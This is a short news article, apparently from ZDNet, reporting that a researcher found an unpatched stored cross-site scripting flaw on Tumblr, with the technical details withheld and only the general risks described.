Tumblr haunted by stored (persistent) XSS flaw

Summary:Tumblr users are sitting ducks for cookie theft, malicious site redirection and script execution attacks.

A security researcher has posted evidence of a serious cross-site scripting vulnerability on Tumblr, the popular micro-blogging site used by millions.

Technical details on the flaw, described as a stored (persistent) XSS issue, is being withheld by Riyaz Walikar, the researcher who found the issue.

follow Ryan Naraine on twitter

Walikar said he disclosed the issue to Tumblr on June 25, 2012 but the vulnerability still exists, putting millions of web surfers at risk of malicious hacker attacks.

"XSS can cause a lot of serious problems. An attacker can steal cookies, redirect users to fake or malicious sites, control a user's browser using automated frameworks like BeEF and download and execute exploits on the victim's computer. Stored XSS is even more dangerous since the script is stored on the server and is executed everytime user visits an infected page," Walikar warned in a blog post that discusses the flaws.

The blog post contains two screenshots to demonstrate the XSS flaws.


Topics: Security, Enterprise Software, Social Enterprise


Ryan Naraine is a journalist and social media enthusiast specializing in Internet and computer security issues. He is currently security evangelist at Kaspersky Lab, an anti-malware company with operations around the globe. He is taking a leadership role in developing the company's online community initiative around secure content managem... Full Bio

zdnet_core.socialButton.googleLabel Contact Disclosure

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.

Related Stories

The best of ZDNet, delivered

You have been successfully signed up. To sign up for more newsletters or to manage your account, visit the Newsletter Subscription Center.
Subscription failed.